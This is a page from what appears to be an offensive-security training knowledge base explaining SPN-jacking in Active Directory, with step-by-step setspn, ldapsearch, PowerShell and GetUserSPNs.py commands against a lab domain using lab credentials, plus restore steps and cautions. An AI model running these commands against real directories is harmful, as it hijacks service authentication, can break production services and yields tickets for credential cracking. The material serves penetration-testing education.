Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Service Principals / Techniques

SPN Jacking

SPN-jacking moves an existing SPN from the legitimate owner to an account we control. After the move, Kerberos tickets for that service are encrypted with our account key. This can break the real service, but it is an important primitive for understanding SPN ownership and Kerberos routing.

Check current owner

setspn -Q HTTP/web01.ootw.local
setspn -L OOTW\svc_web

LDAP owner lookup

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(servicePrincipalName=HTTP/web01.ootw.local)' sAMAccountName distinguishedName servicePrincipalName

Remove from old owner

setspn -D HTTP/web01.ootw.local OOTW\svc_web

Add to controlled owner

setspn -S HTTP/web01.ootw.local OOTW\student

PowerShell move

Set-ADUser -Identity svc_web -ServicePrincipalNames @{Remove='HTTP/web01.ootw.local'}
Set-ADUser -Identity student -ServicePrincipalNames @{Add='HTTP/web01.ootw.local'}

Request ticket for hijacked SPN

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user student -outputfile hijacked.hash

Restore original owner

setspn -D HTTP/web01.ootw.local OOTW\student
setspn -S HTTP/web01.ootw.local OOTW\svc_web
setspn -Q HTTP/web01.ootw.local

Duplicate check

setspn -X

Notes

  • SPN-jacking is noisy and can break production authentication.
  • The KDC encrypts the ticket to the current SPN owner.
  • If the real service still runs as the old owner, clients may receive KRB_AP_ERR_MODIFIED.
  • Use this in labs to understand ownership, not as a casual first option.